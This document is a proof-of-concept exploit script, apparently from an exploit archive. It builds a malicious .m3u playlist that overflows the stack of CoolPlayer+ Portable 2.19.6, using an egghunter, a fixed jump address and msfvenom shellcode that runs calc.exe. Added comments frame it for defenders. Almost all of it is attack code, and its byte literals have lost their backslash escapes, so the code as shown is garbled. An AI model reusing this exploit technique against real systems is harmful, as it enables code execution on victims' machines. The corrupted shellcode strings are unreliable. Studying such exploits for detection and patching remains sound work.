CoolPlayer+ Portable 2.19.6 Stack Overflow
Posted on 26 July 2016
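# Exploit Title: [CoolPlayer+ Portable build 2.19.6 - .m3u Stack Overflow [Egghunter+ASLR bypass]]
# Exploit Author: [Karn Ganeshen]
# Download link: [https://sourceforge.net/projects/portableapps/files/CoolPlayer%2B%20Portable/CoolPlayerPlusPortable_2.19.6.paf.exe/download?use_mirror=liquidtelecom]
# Version: [Current version 2.19.6]
# Tested on: [Windows Vista Ultimate SP2]
#
# Couple of bof exploits for older versions already on EDB:
# https://www.exploit-db.com/search/?action=search&description=coolplayer
#!/usr/bin/python
"""Generate the proof-of-concept .m3u playlist described in the header above.

The script only concatenates fixed string literals and writes the result to
``filename`` in the current directory. All literals are kept byte-for-byte as
they appear in the source page; nothing is decoded or transformed here.

For defenders: the produced file is a single line of a few kilobytes that
starts with a long run of ``A`` and contains the ``T00WT00W`` marker, which
makes it straightforward to match in file-based detection. The ``eip`` comment
records that ``coolplayer+.exe`` was built without ASLR/rebase/SafeSEH, which
is the reason a fixed address is usable at all.
"""

total_buf = 2000  # kept from the original; not referenced elsewhere in the script
filename = "evil.m3u"

# msfvenom -p windows/exec cmd=calc.exe -b x00x0ax0c d EXITFUN=thread -f c
# Payload size: 220 bytes
shellcode = ("xdbxdcxd9x74x24xf4x58xbbx9axc7xdbxe9x31xc9xb1"
             "x31x31x58x18x83xe8xfcx03x58x8ex25x2ex15x46x2b"
             "xd1xe6x96x4cx5bx03xa7x4cx3fx47x97x7cx4bx05x1b"
             "xf6x19xbexa8x7axb6xb1x19x30xe0xfcx9ax69xd0x9f"
             "x18x70x05x40x21xbbx58x81x66xa6x91xd3x3fxacx04"
             "xc4x34xf8x94x6fx06xecx9cx8cxdex0fx8cx02x55x56"
             "x0exa4xbaxe2x07xbexdfxcfxdex35x2bxbbxe0x9fx62"
             "x44x4exdex4bxb7x8ex26x6bx28xe5x5ex88xd5xfexa4"
             "xf3x01x8ax3ex53xc1x2cx9bx62x06xaax68x68xe3xb8"
             "x37x6cxf2x6dx4cx88x7fx90x83x19x3bxb7x07x42x9f"
             "xd6x1ex2ex4exe6x41x91x2fx42x09x3fx3bxffx50x55"
             "xbax8dxeex1bxbcx8dxf0x0bxd5xbcx7bxc4xa2x40xae"
             "xa1x5dx0bxf3x83xf5xd2x61x96x9bxe4x5fxd4xa5x66"
             "x6axa4x51x76x1fxa1x1ex30xf3xdbx0fxd5xf3x48x2f"
             "xfcx97x0fxa3x9cx79xaax43x06x86")

# Egghunter - 32 bytes
eggh = ("x66x81xcaxffx0fx42x52x6a"
        "x02x58xcdx2ex3cx05x5ax74"
        "xefxb8x54x30x30x57x8bxfa"
        "xafx75xeaxafx75xe7xffxe7")

# EIP overwrite appears to depend upon location from where the evil file is loaded from
# Tested from location - C:
# For e.g. offset will be different if file is loaded from C: (260) vs C:Windows (249)
junk = "A" * 28
eip = "xa1x99x42x00"  # 0x004299a1 jmp ebx - coolplayer+.exe [noaslr,norebase,nosafeseh]

# On-disk layout of the generated playlist, in order: 28 "A" characters, the
# egghunter literal, 200 repetitions of the "x90" literal, the eip literal,
# 18 more "x90" repetitions, the "T00WT00W" tag, the payload literal, and
# 1490 trailing "x90" repetitions.
evil = (
    junk
    + eggh
    + "x90" * 200
    + eip
    + "x90" * 18
    + "T00WT00W"
    + shellcode
    + "x90" * 1490
)

# Context manager instead of open()/close() so the handle is released even if
# write() raises; the original also shadowed the builtin name `file`.
with open(filename, 'w') as out:
    out.write(evil)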